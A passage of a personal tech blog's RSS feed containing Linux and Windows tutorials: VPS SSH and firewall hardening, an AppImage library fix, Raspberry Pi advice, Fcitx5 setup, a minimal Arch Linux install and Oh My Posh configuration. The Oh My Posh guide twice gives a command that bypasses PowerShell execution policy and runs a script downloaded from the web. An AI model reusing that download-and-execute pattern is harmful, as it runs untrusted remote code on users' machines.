### 4. Use SSH Key Authentication

For authentication, use SSH key pairs. Generate a key pair on your local machine and add the public key to the server&apos;s `~/.ssh/authorized_keys` file.

```shell
ssh-keygen -t rsa
ssh-copy-id newusername@your_server_ip
```
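
If both your client and server support it, an Ed25519 key is a widely used modern alternative to RSA; the comment string is just a label:

```shell
ssh-keygen -t ed25519 -C "you@example.com"
ssh-copy-id -i ~/.ssh/id_ed25519.pub newusername@your_server_ip
```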

### 5. Install a Firewall &amp; Change SSH Port Number

Fortify your server&apos;s security by configuring a firewall and modifying the SSH port number:

1. Install UFW (Uncomplicated Firewall):
   Begin by installing the Uncomplicated Firewall, which simplifies managing firewall rules.

   ```shell
   sudo apt-get install ufw
   ```

2. Enable UFW:
   Activate UFW and ensure it starts automatically at boot.

   ```shell
   sudo ufw enable
   ```

3. Allow SSH Traffic on Custom Port:
   Permit SSH traffic on the custom port you&apos;ve chosen (replace `your_custom_port_number` with your desired port).

   ```shell
   sudo ufw allow your_custom_port_number/tcp
   ```

4. Change SSH Port Number:
   Modify the default SSH port (22) to your chosen custom port. This adds an extra layer of security by moving SSH away from the default port.

   ```shell
   sudo nano /etc/ssh/sshd_config
   # Change &apos;Port 22&apos; to &apos;Port your_custom_port_number&apos;
   # Save the file and exit the text editor
   sudo systemctl restart sshd   # the unit is named ssh on some distributions
   ```

By completing these steps, you establish a firewall, modify the SSH port, and enhance your server&apos;s security, reducing potential threats.

### 6. Restrict User Logins

Allow only specific users to log in via SSH. Add the following line to the SSH configuration file (`/etc/ssh/sshd_config`) and restart the SSH service.

```shell
AllowUsers newusername
```

### 7. Disable Root Login

Prevent direct root login via SSH. Set the following option in the SSH configuration file and restart the SSH service.

```shell
PermitRootLogin no
```
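
After editing, you can ask sshd itself which settings are actually in effect; `sshd -T` prints the fully resolved configuration in lowercase:

```shell
sudo sshd -T | grep -E 'permitrootlogin|passwordauthentication|port'
```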

### 8. Restrict Ping Responses

Disable ICMP ping responses to thwart potential reconnaissance attacks:

1. Open the UFW (Uncomplicated Firewall) configuration file:

   ```shell
   sudo nano /etc/ufw/before.rules
   ```

2. Locate the existing ICMP rules and change the target of the `echo-request` rule from `ACCEPT` to `DROP` (a DROP rule appended at the end of the file would sit after the stock ACCEPT rules and never be reached):

   ```shell
   -A ufw-before-input -p icmp --icmp-type echo-request -j DROP
   ```

3. Save the file and exit the text editor.

4. Reload the UFW rules to apply the changes:

   ```shell
   sudo ufw reload
   ```

5. Reboot your server to ensure the changes take effect:

   ```shell
   sudo reboot
   ```

By implementing these measures, you effectively prevent your server from responding to ICMP ping requests, reducing its exposure to potential reconnaissance attempts.

## Conclusion

Security is an ongoing process. Regularly review and update your security measures to adapt to emerging threats. By following these steps and using the provided command lines, you significantly enhance your VPS hosting server&apos;s security, ensuring a safer environment for your applications and data.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>dlopen() Error: Resolving Shared Library Issues on Arch Linux</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-appimage-error/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-appimage-error/</guid><description>Discover effective solutions to tackle the elusive dlopen() error on Arch Linux. Learn how to troubleshoot shared library loading problems, fix application launch issues, and restore your system&apos;s stability.</description><pubDate>Tue, 14 Feb 2023 00:00:00 GMT</pubDate><content:encoded>## Resolving the dlopen() Error with Appimage on Arch Linux

The allure of an Appimage can quickly turn into frustration when an unexpected roadblock presents itself. You&apos;re greeted by a discouraging &quot;dlopen() error.&quot; This error, often tied to loading &quot;libfuse.so.2,&quot; can be a stumbling block, especially when dealing with applications that rely on FUSE (Filesystem in Userspace) features.

1. Install `fuse2` Using pacman:

   Open your terminal and execute the following command:

   ```shell
   sudo pacman -S fuse2
   ```

   This essential step ensures that the necessary FUSE library, including &quot;libfuse.so.2,&quot; is readily available, thus paving the way for uninterrupted usage of FUSE-dependent applications.

2. **[Optional]** Install `fuse` and `squashfuse`:

   While not obligatory, this step can further enhance compatibility and provide a comprehensive approach to handling FUSE-related operations. You may choose to install `fuse` and `squashfuse` for an extended range of functionalities:

   ```shell
   sudo pacman -S fuse squashfuse
   ```

   Please note that this step is optional and primarily caters to specific use cases.

As you embark on this journey to troubleshoot the dlopen() error and ensure the harmonious execution of your chosen Appimage, remember that installing `fuse2` and, if desired, `fuse` and `squashfuse` lays the foundation for a seamless Appimage experience, free from the constraints of unresolved dependencies.

## How It Works

The installation of `fuse2` and, optionally, `fuse` and `squashfuse`, serves as a gateway to an enhanced Appimage adventure. These libraries form the bridge between FUSE-based applications and your system&apos;s filesystem, offering a conduit through which applications can interact and manipulate data as if they were operating at the kernel level.

By presenting these essential libraries, the notorious dlopen() error, often triggered by missing or mismatched dependencies, is effectively neutralized. When you fire up your Appimage, it elegantly loads and interacts with the necessary libraries, ensuring a seamless, error-free exploration of your chosen application.

## Reference

- https://github.com/m1911star/affine-client/issues/10</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Before You Buy a Raspberry Pi: Essential Considerations</title><link>https://ummit.dev//posts/linux/raspberry-pi/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/raspberry-pi/</guid><description>Everything you need to know before purchasing a Raspberry Pi including required accessories and use cases.</description><pubDate>Tue, 24 Jan 2023 00:00:00 GMT</pubDate><content:encoded>## What is Raspberry Pi?

In essence, Raspberry Pi is a versatile and compact single-board computer that typically runs Linux distributions built for it. While its size might be modest, its capabilities are far-reaching, making it a popular choice for a range of projects and applications.

## Raspberry Pi: Pros and Cons

1. **Compact Size:**
   - The standout feature is its diminutive size, making it a portable and space-efficient computing solution.

However, beyond its sleek design, Raspberry Pi models may not offer significant advantages, especially when considering the market prices and availability.

## Raspberry Pi Ports

Examining the Raspberry Pi 4 Model B, it boasts various ports for connectivity:

- Micro HDMI Port x2
- Power Port x1
- Ethernet Port x1
- Headphone Port x1
- USB 2.0 Port x2
- USB 3.0 Port x2
- Micro SD Card Port x1

## Practical Use Cases

What can you accomplish with this compact computer? Raspberry Pi can function much like any standard computer, suitable for everyday tasks. However, it often finds its niche as a hosting platform, serving admirably as a modest server.

![distro](https://hackster.imgix.net/uploads/attachments/1381275/image_nZIpjonlUU.png?auto=compress%2Cformat)

## Essential Considerations Before Purchase

Acquiring a Raspberry Pi entails more than just the device itself. Several additional components are essential for a seamless experience:

### 1. Power Supply - Opt for a Reliable Source

The Raspberry Pi power supply utilizes a Type-C port. While you can leverage an Android mobile phone cable for power, investing in the official power supply is recommended for optimal performance and convenience.

![power-supply](https://raspberrypi.dk/wp-content/uploads/2019/06/usb-c-stroemforsyning-raspberry-pi-eu-5v-3a.jpg)

### 2. Micro SD Card - Install and Run Your OS

To install and run the operating system (OS), a Micro SD Card is indispensable. Acquire a USB Hub with a built-in Micro SD Card reader for added convenience.

![sd-card](https://www.easyshoppi.com/wp-content/uploads/2019/11/vvv2.jpg)

### 3. Keyboard, Mouse - Navigating Your Raspberry Pi

A keyboard is a necessity for typing, while a mouse is optional. Ensure you have a keyboard at your disposal for a smooth interaction with your Raspberry Pi.

![keyboard-mouse](https://hocotech.com/wp-content/uploads/2022/02/hoco-gm12-light-and-shadow-rgb-gaming-keyboard-mouse-set-english.jpg)

### 4. Micro HDMI Cable - Connect to Your Monitor

For users accustomed to connecting devices with HDMI cables, a Micro HDMI Cable is required. Alternatively, a Micro HDMI Adapter can be employed for seamless connectivity.

![mirco-hdmi-cable](https://www.bhphotovideo.com/images/images2500x2500/Pearstone_hdd_1015_High_Speed_HDMI_to_Micro_888043.jpg)

### 5. Understanding Hardware and Linux Basics

Given that Raspberry Pi operates with Linux-based OS, a fundamental understanding of Linux commands and hardware components is beneficial. Familiarize yourself with ports like Ethernet, USB-A, and USB-C.

![linux-distro](https://149366088.v2.pressablecdn.com/wp-content/uploads/2020/01/distro-board.jpg)

## Final Thoughts - Unleashing the Power of Raspberry Pi

Before you dive into the world of Raspberry Pi, it&apos;s crucial to understand its features and requirements. Consider your specific needs and whether Raspberry Pi aligns with your goals. Armed with this knowledge, you can confidently embark on an exciting journey into the realm of Raspberry Pi technology!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Arch Linux Fcitx5 Installation Guide for Quick Classic (速成)</title><link>https://ummit.dev//posts/linux/tools/fcitx/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/fcitx/</guid><description>Learn how to install and configure Fcitx5 on Arch Linux to enable multilingual typing support for languages such as Chinese and Japanese.</description><pubDate>Fri, 16 Dec 2022 00:00:00 GMT</pubDate><content:encoded>## Fcitx5 Introduction

Fcitx5, the successor to Fcitx, is a lightweight input method framework for Linux. Offering additional language support through various addons, it enhances your typing experience on Linux systems. This guide will walk you through the installation process and configuration steps for Fcitx5.

## Install Fcitx5 and Required Addons

Let&apos;s start by installing Fcitx5 and the necessary addons to enable multilingual typing support.

```shell
sudo pacman -S fcitx5-chinese-addons libime fcitx5 fcitx5-table-extra
```

### Support Program Windows

To ensure comprehensive language support across various programs, install libraries for technologies used by different applications. Execute the following command:

```shell
sudo pacman -S fcitx5-qt fcitx5-gtk fcitx5-im
```

## Environment variables

Environment variables are necessary for the input method to work correctly under X11.

&gt;TIPS: If you are under Wayland, you can skip this step; Wayland does not need these environment variables for the input method.

```shell
sudo vim /etc/environment
```

Paste the following lines (`/etc/environment` is not a shell script, so the `export` keyword is not used):

```shell
GTK_IM_MODULE=fcitx
QT_IM_MODULE=fcitx
XMODIFIERS=@im=fcitx
SDL_IM_MODULE=fcitx
```

## Configuring Input Methods

You will need to configure the input method to select your desired input language. Fcitx5 provides a graphical configuration tool that works regardless of your desktop environment, and it is easiest to use it directly.

```shell
sudo pacman -S fcitx5-configtool
```

1. After installing the tool, you should be able to find it in your application menu; open it and configure your input method.
2. Find your preferred input language and add it to the list (e.g., Quick Classic for 速成輸入法).
3. Use the arrow `&lt;` button to move it to the current input method list.

&gt;TIPS: If you cannot find your preferred input method, uncheck the `Only Show Current Language` option to show all available input methods.

![config tool](./configtool.png)

## Restart

After completing the above steps, log out and log back in to apply the changes.

&gt;TIPS: Wayland users don&apos;t need to log out; the changes are applied immediately.

## Check System Configuration

Type the following command to verify the system configuration:

```shell
echo $GTK_IM_MODULE
```

If `fcitx` is displayed, the configuration was successful.
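
To check all four variables at once, a small POSIX-shell loop works; the values will be empty until you have logged back in:

```shell
# Print each input-method variable and its current value
for v in GTK_IM_MODULE QT_IM_MODULE XMODIFIERS SDL_IM_MODULE; do
  printf '%s=%s\n' "$v" "$(printenv $v)"
done
```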

## Font Problem and Solution

If you encounter font display issues, particularly garbled characters, install a Chinese font package. Run the following command:

```shell
sudo pacman -S wqy-zenhei
```

Then restart fcitx5 to apply the changes.

## References

- [Arch Linux - Simplified Chinese Localization](https://wiki.archlinux.org/title/Localization/Simplified_Chinese?rdfrom=https%3A%2F%2Fwiki.archlinux.org%2Findex.php%3Ftitle%3DLocalization_%28%25E7%25AE%2580%25E4%25BD%2593%25E4%25B8%25AD%25E6%2596%2587%29%2FSimplified_Chinese_%28%25E7%25AE%2580%25E4%25BD%2593%25E4%25B8%25AD%25E6%2596%2587%29%26redirect%3Dno)
- [ProgrammerAll - Fcitx5 Installation Guide](https://www.programmerall.com/article/6459746231/)
- [YouTube Video Tutorial](https://www.youtube.com/watch?v=yXSDJWtGeKY)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Step-by-Step Guide to Install Arch Linux from Scratch (Minimal System)</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-base-installation/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-base-installation/</guid><description>Guide for helping people to install Arch Linux from scratch, resulting in a minimal system. Not including the installation of a desktop environment :)</description><pubDate>Fri, 16 Dec 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction

This comprehensive guide will walk you through the process of installing Arch Linux from start to finish, resulting in a minimal system. Please note that this guide will not cover the installation of a desktop environment.

Before you begin, it&apos;s assumed that you have a basic understanding of computer operations and are familiar with using a virtual machine or have a spare computer for the installation of Arch Linux. The process of booting the Arch Linux ISO will not be covered in this guide.

### Before You Begin

Arch Linux operates on a philosophy of simplicity, user control, and customization. Unlike more user-friendly distributions such as Linux Mint or Ubuntu, Arch does not provide a graphical user interface (GUI) during the installation process. Instead, it relies heavily on the command line.

If you are new to GNU/Linux or have less than a year of experience, it is advisable to gain some familiarity with GNU/Linux basics before attempting an Arch installation.

In Arch, every step of the installation process is executed through the command line. This direct exposure to the terminal allows for greater control but may be challenging if you are uncomfortable with command-line operations.

## Check the Connection

Before starting the installation, ensure that you have a working internet connection. You can verify your connection by using the `ping` command:

```shell
ping archlinux.org
```

### Network Connection via Wireless (Wi-Fi)

If you are using a wireless connection, you can connect to a Wi-Fi network using the `iwctl` command, which is part of the iwd package installed by default on the official Arch Linux ISO.

To start the `iwctl` command, enter:

```shell
iwctl
```

Then, use the following commands to connect to your Wi-Fi network:

```shell
[iwd]# device list
[iwd]# station wlan0 scan
[iwd]# station wlan0 get-networks
[iwd]# station wlan0 connect [SSID]
```

After successfully connecting to the Wi-Fi network, exit the `iwctl` command by typing `exit`. You can then check your connection again using the `ping` command.

## Partition Setup

Before installing Arch Linux, you need to partition your disk. You can use tools like `cfdisk`, `fdisk`, or `gdisk` for this purpose. In this guide, we will use `gdisk`.

### Using gdisk

First, list the available disks:

```shell
lsblk
```

Next, use `gdisk` to partition the disk:

```shell
gdisk /dev/sda
```

Create the following partitions:

1. Type `o` to create a new GPT partition table.
2. Type `n` to create a new partition, then press `Enter` to accept the default first sector.
3. Type `+500M` for the last sector and `ef00` for the partition type (EFI System).
4. Type `n` to create another partition, accept the default first sector, type `+30G` for the last sector, and `8300` for the partition type (Linux filesystem).
5. Repeat the previous step to create a third partition with `+25G` for the last sector and `8300` for the partition type (Linux filesystem).
6. Finally, create a fourth partition, accept the default first sector, type `+4.5G` for the last sector, and `8200` for the partition type (Linux swap).

After creating the partitions, type `w` to write the changes to the disk. You should now have the following partitions:

| Size | Type             | Code |
|------|------------------|------|
| 500M | EFI System       | ef00 |
| 30G  | Linux filesystem | 8300 |
| 25G  | Linux filesystem | 8300 |
| 4.5G | Linux swap       | 8200 |
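
For reference, the same layout can be created non-interactively with `sgdisk` (from the `gptfdisk` package). This sketch is destructive (it wipes `/dev/sda`), so treat the device name and sizes as assumptions to adapt; the swap size is written as 4608M because sgdisk takes integer sizes:

```shell
sgdisk -o \
  -n 1:0:+500M  -t 1:ef00 \
  -n 2:0:+30G   -t 2:8300 \
  -n 3:0:+25G   -t 3:8300 \
  -n 4:0:+4608M -t 4:8200 \
  /dev/sda
```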

## Partition Format

Before installing Arch Linux, you need to format the partitions. We will use the `mkfs` command for this purpose.

First, format the EFI System partition, which is used for the boot loader:

```shell
mkfs.fat -F32 /dev/sda1
```

Next, format the root and home partitions with the ext4 filesystem:

```shell
mkfs.ext4 /dev/sda2
mkfs.ext4 /dev/sda3
```

Finally, format the swap partition using the `mkswap` command:

```shell
mkswap /dev/sda4
swapon /dev/sda4
```

### Mount the Partitions

Now, mount the partitions to the `/mnt` directory, starting with the root partition:

```shell
mount /dev/sda2 --mkdir /mnt
```

Next, mount the home partition:

```shell
mount /dev/sda3 --mkdir /mnt/home
```

&gt;TIPS: The EFI partition will not be mounted here; we&apos;ll mount it after chrooting into the new system.

## Install Basic Arch System

Let&apos;s install the basic Arch Linux system with the `pacstrap` command.

```shell
pacstrap -i /mnt base base-devel linux linux-headers linux-firmware vim networkmanager sudo
```

## Generate File System Table (fstab)

Generate the file system table (fstab). This table tells the system how to mount the partitions at boot.

```shell
genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
```

## Switching new system

Switch to the new system by using `arch-chroot`:

```shell
arch-chroot /mnt
```

## Update the root password

Your root password is not set by default, so you need to set it:

```shell
passwd
```

## Add a new user

Create a new normal user:

```shell
useradd -m &lt;username&gt;
```

Set the password for the new user:

```shell
passwd &lt;username&gt;
```

Add permissions to the new user:

```shell
usermod -aG wheel,storage,power &lt;username&gt;
```

## Apply new user permissions

We will give the new user permissions to use `sudo`:

```shell
EDITOR=vim visudo
```

Uncomment the following line:

```shell
%wheel ALL=(ALL:ALL) ALL
```

Optionally, adjust `timestamp_timeout`, which sets how many minutes sudo caches your password (`0` makes sudo ask every time):

```shell
Defaults timestamp_timeout=0
```

## System Language

We will set the system language to English (US) UTF-8 and generate the locale.

```shell
vim /etc/locale.gen
```

Find `en_US.UTF-8 UTF-8`, remove the `#` symbol to uncomment it, and save the file.

Generate the locale:

```shell
locale-gen
```

Set the system language:

```shell
echo LANG=en_US.UTF-8 &gt; /etc/locale.conf
```

## Hostname Settings

Set the hostname:

```shell
echo Archlinux &gt; /etc/hostname
```

Edit the hosts file:

```shell
vim /etc/hosts
```

Add the following lines:

```shell
127.0.0.1      localhost
::1            localhost
127.0.1.1      Archlinux.localdomain    Archlinux
```

## Timezone Sync

Set the timezone:

```shell
ln -sf /usr/share/zoneinfo/Asia/Taipei /etc/localtime
```

Sync the hardware clock:

```shell
hwclock --systohc
```

## Mount EFI Partition

It&apos;s time to mount the EFI partition to `/boot/efi`.

```shell
mount /dev/sda1 --mkdir /boot/efi
```

### Bootloader configuration

Install GRUB and efibootmgr for UEFI systems:

```shell
pacman -S grub efibootmgr
```

Install GRUB to the EFI system partition:

```shell
grub-install --target=x86_64-efi --efi-directory=/boot/efi
```

Generate the GRUB configuration file:

```shell
grub-mkconfig -o /boot/grub/grub.cfg
```

## Enable Internet Service

It&apos;s essential to enable the NetworkManager service to have internet access after rebooting the system.

```shell
systemctl enable NetworkManager.service
```

## Exit the chroot environment

As for the setup of minimal Arch Linux, we are done now :) Let&apos;s exit the chroot environment.

```shell
exit
```

## Reboot

Reboot to enjoy your new Arch Linux system :)

```shell
reboot
```

## Conclusion

Arch Linux is a great distribution for those who want to learn more about Linux and have a more personalized experience. The installation process might be challenging, but it&apos;s a rewarding journey that allows you to build a system tailored to your preferences.

After you master Arch Linux, you should feel more comfortable with the command line, understand how a GNU/Linux system works, and be able to troubleshoot issues that arise.

For the more hardcore, you can try Gentoo or LFS (Linux From Scratch) to deepen your GNU/Linux knowledge further.

Before that, though, Arch should already feel simple and easy to you; otherwise, these two distributions will be a nightmare. Both are source-based, so you compile everything from source code, and their configuration is more involved than Arch Linux&apos;s.

Are you tired of the same old, bland terminal prompts on your Windows system? Do you yearn for a more stylish and functional command-line experience? Look no further than Oh My Posh! This dynamic and customizable prompt framework can take your terminal game to the next level. In this guide, we&apos;ll walk you through the process of installing and setting up Oh My Posh on your Windows machine.

## What is Oh My Posh?

Oh My Posh is a versatile and extensible prompt framework designed to enhance the appearance and functionality of your terminal. With Oh My Posh, you can create visually appealing and informative prompts that display relevant information about your environment, such as the current directory, Git branch, and more. It&apos;s a fantastic tool for developers, system administrators, and anyone who spends a significant amount of time in the terminal.

## Install Windows Terminal

Before we begin installing Oh My Posh, ensure that you have Windows Terminal installed on your system. You can easily find it on the Microsoft Store using the following link: [Windows Terminal on Microsoft Store](ms-windows-store://pdp/?productid=XP8K0HKJFRXGCK). Simply click the link to navigate to the store and install Windows Terminal.

## Install Oh My Posh

Installing Oh My Posh on your Windows system is a breeze, and you have multiple options to choose from, whether you prefer a package manager or manual installation. Here are three methods to install Oh My Posh:

### Method 1: Using `winget`

To install Oh My Posh using `winget` (the Windows Package Manager), run the following command:

```powershell
winget install JanDeDobbeleer.OhMyPosh -s winget
```

### Method 2: Using `scoop`

For those who rely on `scoop` (the Windows command-line installer), installing Oh My Posh is as simple as running this command:

```powershell
scoop install https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/oh-my-posh.json
```

### Method 3: Manual Installation

If you prefer manual installation, follow these steps:

1. Open your PowerShell terminal as an administrator.

2. Run the following command to set the execution policy and bypass any restrictions:

```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
```

3. Next, execute the following command to download and install Oh My Posh:

```powershell
Invoke-Expression ((New-Object System.Net.WebClient).DownloadString(&apos;https://ohmyposh.dev/install.ps1&apos;))
```

And that&apos;s it! Oh My Posh is now successfully installed on your Windows system.

## Understanding Nerd Fonts

Nerd Fonts are specialized fonts that have been patched to include a wide range of icons and symbols. These fonts are essential for Oh My Posh to display icons associated with themes and prompts correctly.

&gt; Note: While various Nerd Fonts are compatible with Oh My Posh, the official website recommends [Meslo LGM NF](https://github.com/ryanoasis/nerd-fonts/releases/download/v3.0.2/Meslo.zip) for the best experience.

### Installing Fonts for Oh My Posh

When it comes to personalizing your terminal experience with Oh My Posh, fonts play a crucial role in adding style and functionality. Nerd Fonts, a collection of fonts patched with icons, are the go-to choice for Oh My Posh users. In this guide, we&apos;ll walk you through the process of installing Nerd Fonts to enhance your Oh My Posh experience.

#### Way 1: Using Oh My Posh&apos;s CLI for Font Installation

Oh My Posh simplifies the process of installing Nerd Fonts with its built-in CLI (Command Line Interface). Follow these steps to install a Nerd Font using the CLI:

1. Open your terminal as an administrator for system-wide font installation. Alternatively, if you lack admin rights, you can use the `--user` flag, keeping in mind that this may have certain side effects with specific applications.

2. Execute the following command to start the font installation process:

```powershell
oh-my-posh font install
```

#### Way 2: Manual Installation of Nerd Fonts

Alternatively, you can manually install Nerd Fonts by following these steps:

1. Visit the Nerd Fonts website at [www.nerdfonts.com](https://www.nerdfonts.com/font-downloads).

2. Download the zip archive containing your preferred Nerd Font.

3. Extract the contents of the zip archive.

4. Right-click on each font file and select &quot;Install&quot; to install the fonts on your system.

#### Adjusting Terminal Font Settings

To fully benefit from the installed Nerd Fonts, you might need to configure your terminal to use them. Here&apos;s how you can do it:

1. Open your terminal.

2. Access the terminal&apos;s settings or preferences menu. This can typically be found in the menu bar.

3. Navigate to the &quot;Presets,&quot; &quot;Profiles,&quot; or &quot;Appearance&quot; section.

4. Look for the font settings and select the Nerd Font you installed. Adjust the font size if needed.

##### Visual Guide

For a visual walkthrough of the font installation process, refer to the following animated guide:

![Install Nerd Fonts](./set-fonts.gif)

## Browsing and Selecting Themes

To discover the available themes, you can visit the official Oh My Posh themes documentation [here](https://ohmyposh.dev/docs/themes). Here, you&apos;ll find a collection of themes, each designed to provide a unique and captivating terminal prompt.

### Listing Available Themes

1. **Discover Themes**: To explore the wide array of available themes, visit the official Oh My Posh themes documentation linked above. There you&apos;ll find an enticing collection of themes, each meticulously designed to offer a distinctive and engaging terminal prompt.

2. **Command-Line Discovery**: Alternatively, you can use the command line to list all the available themes. Open your terminal and execute the following command:

```powershell
Get-PoshThemes
```

![listing-themes](./list.gif)

### Previewing Themes

Before applying a theme, it&apos;s a good idea to preview how it will look on your terminal. You can use the following command to see how a specific theme would appear:

```powershell
oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\&lt;theme_name&gt;.omp.json | Invoke-Expression
```

Replace `&lt;theme_name&gt;` with the actual name of the theme you&apos;re interested in.

This command allows you to get a real-time preview of how the selected theme will affect your terminal prompt. It&apos;s a convenient way to try out different themes and see which one resonates with your style.

### Applying the Themes

After you&apos;ve found a theme that catches your eye, it&apos;s time to make it your own. To get started, follow these steps:

1. **Open Your Terminal**: Launch your terminal application to begin the customization process.

2. **Create a Profile Script**: If you don&apos;t have a profile script already, you&apos;ll need to create one. The profile script controls the configuration settings for your terminal. Use the following command to create a new profile script:

   ```powershell
   New-Item -Path $PROFILE -Type File -Force
   ```

   This command will create a new profile script in the specified path.

3. **Access Theme Configuration**: To edit the `$PROFILE` script, you can use the Notepad text editor. Open Notepad and then open the `$PROFILE` script using the command:

   ```powershell
   notepad $PROFILE
   ```

   The path to the `$PROFILE` script is typically:

   ```plain
   C:\Users\&lt;Your_Username&gt;\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
   ```

4. **Selecting a Theme**:

   a. **Option 1 - Set-PoshPrompt**:
   Locate the line that sets the theme using the `Set-PoshPrompt` command. Modify this line to reflect the name of the theme you want to use. For example:

   ```powershell
   Set-PoshPrompt -Theme theme_name
   ```

   Replace `theme_name` with the actual name of the theme you selected.

   b. **Option 2 - oh-my-posh init**:
   Alternatively, you can use the following command to select a theme and apply it directly to your current terminal session:

   ```powershell
   oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\&lt;theme_name&gt;.omp.json | Invoke-Expression
   ```

   Replace `theme_name` with the actual name of the theme you selected.

5. **Save and Apply Changes**: Save the changes to the `$PROFILE` script in Notepad and close the editor.

By following these steps, you&apos;ll seamlessly integrate your chosen theme into your terminal environment, allowing you to enjoy a personalized and visually appealing command-line experience.

## Optional: Installing and Inserting Required Modules

In this section, we will walk through the process of installing and inserting the necessary modules to enhance your Oh My Posh experience. These modules provide additional features such as displaying illustrations, colors, command history, and Git information. Let&apos;s get started!

&gt; Note: Before you proceed, please open PowerShell as an `Administrator`.

### Install PSReadLine Module

The `PSReadLine` module is essential for displaying the commands you&apos;ve entered before, making it convenient for you to re-enter commands.

```powershell
Install-Module PSReadLine -Force
```

### Install posh-git Module

The `posh-git` module is used to display Git information from your current repository (if you&apos;re in a Git repository).

```powershell
Install-Module posh-git -Force
```

### Install Terminal-icons Module

The `Terminal-icons` module enhances your command console by displaying icons for your files and folders, adding a visually appealing touch to your terminal.

```powershell
Install-Module Terminal-icons -Force
```

## Inserting Modules for Enhanced Functionality

Now that we&apos;ve installed the necessary modules, let&apos;s delve into how to insert them into PowerShell, allowing you to utilize their functions and enhance your terminal experience. Below, we&apos;ll guide you through the process of inserting each module.

### Inserting Terminal-icons Module

The `Terminal-icons` module enhances your command console by displaying icons for files and folders, making your terminal visually engaging and informative. To insert this module, follow these steps:

1. Launch PowerShell.

2. Enter the following command:

   ```powershell
   Import-Module Terminal-icons
   ```

   This will load the `Terminal-icons` module into your PowerShell session.

### Inserting posh-git Module

The `posh-git` module is designed to display Git-related information, such as the current branch name in your repository. To insert this module, proceed as follows:

1. Launch PowerShell.

2. Enter the following command:

   ```powershell
   Import-Module posh-git
   ```

   This command will load the `posh-git` module, enabling its features in your terminal.

### Inserting PSReadLine Module

The `PSReadLine` module enriches your command history experience by offering several modes. To insert this module, follow these steps:

1. Launch PowerShell.

2. Enter the following command:

   ```powershell
   Import-Module PSReadLine
   ```

   This command will load the `PSReadLine` module, providing enhanced command history capabilities.

By inserting these modules, you&apos;ll unlock a range of features and visual enhancements that will elevate your PowerShell sessions. Whether you&apos;re dealing with files and folders, Git repositories, or command history, these modules will streamline your interactions and make your terminal usage more efficient and enjoyable.

#### PSReadLine Modes for Enhanced Command History

Enhance your PowerShell command history experience with different PSReadLine modes that cater to your preferences and ease of use. PSReadLine offers various modes to facilitate command recall and streamline your interactions with previous commands. Here&apos;s how to utilize these modes:

#### PSReadLine Mode: History

This mode mimics the behavior seen on most Linux systems and is a favorite among many users. To enable this mode, use the following command:

&gt; **Note**: In this mode, if the text you&apos;re about to enter matches previous text, a gray prompt displays the matching text.

```powershell
Set-PSReadLineOption -PredictionSource History
```

![PSReadLine Mode: History](./history_1.gif)

#### PSReadLine Mode: ListView

The ListView mode presents a list of all commands related to the text you&apos;ve typed, offering easy command selection.

&gt;**Tip**: Use the arrow keys (↑ ↓ ← →) to navigate the list, then press Enter to execute the selected command.

To activate the ListView mode, execute the following command:

```powershell
Set-PSReadLineOption -PredictionViewStyle ListView
```

![PSReadLine Mode: ListView](./history_2.gif)

By selecting the PSReadLine mode that aligns with your workflow, you can make your PowerShell interactions even more efficient and tailored to your needs. Experiment with these modes to find the one that best suits your preferences.

## Configuring Persistent Modifications in Your PowerShell Profile

While the changes you&apos;ve made so far are valuable, they only apply to the current terminal window. If you close the window, these modifications will be lost. To ensure that your enhancements remain in effect every time you launch PowerShell, you&apos;ll need to make adjustments to your PowerShell profile.

### Opening with Notepad

1. If you use Notepad to edit files, open your profile with the following PowerShell command:

```powershell
notepad $PROFILE
```

#### Modifying the Profile File

2. Once the profile file is open in your preferred text editor, insert the following lines of code:

```powershell
Import-Module Terminal-icons
Import-Module posh-git

Set-PSReadLineOption -PredictionSource History

oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\microverse-power.omp.json | Invoke-Expression
```

3. Save the changes you&apos;ve made to the profile file and then close the text editor.

By appending these lines to your PowerShell profile, you ensure that the specified modules are loaded and the defined settings are applied each time you initiate PowerShell. With this setup, you&apos;ll enjoy a consistent and enriched terminal experience every time you launch PowerShell.

## Article Usage Directives

To facilitate your interaction with this article, here is a concise list of the PowerShell commands and instructions that have been discussed:

1. Installing Oh My Posh using Winget:
   ```powershell
   winget install JanDeDobbeleer.OhMyPosh -s winget
   ```

2. Installing Oh My Posh using Scoop:
   ```powershell
   scoop install https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/oh-my-posh.json
   ```

3. Installing Oh My Posh manually:
   ```powershell
   Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString(&apos;https://ohmyposh.dev/install.ps1&apos;))
   ```

4. Installing the PSReadLine Module:
   ```powershell
Install-Module PSReadLine -Force
   ```

5. Installing the posh-git Module:
   ```powershell
Install-Module posh-git -Force
   ```

6. Installing the Terminal-icons Module:
   ```powershell
   Install-Module Terminal-icons -Force
   ```

7. Importing the Terminal-icons Module:
   ```powershell
   Import-Module Terminal-icons
   ```

8. Importing the posh-git Module:
   ```powershell
   Import-Module posh-git
   ```

9. Importing the PSReadLine Module:
   ```powershell
   Import-Module PSReadLine
   ```

10. Setting PSReadLine mode to History:
    ```powershell
    Set-PSReadLineOption -PredictionSource History
    ```

11. Setting PSReadLine mode to ListView:
    ```powershell
    Set-PSReadLineOption -PredictionViewStyle ListView
    ```

12. Displaying Available Oh My Posh Themes:
    ```powershell
    Get-PoshThemes
    ```

13. Initializing Oh My Posh with a Chosen Theme:
    ```powershell
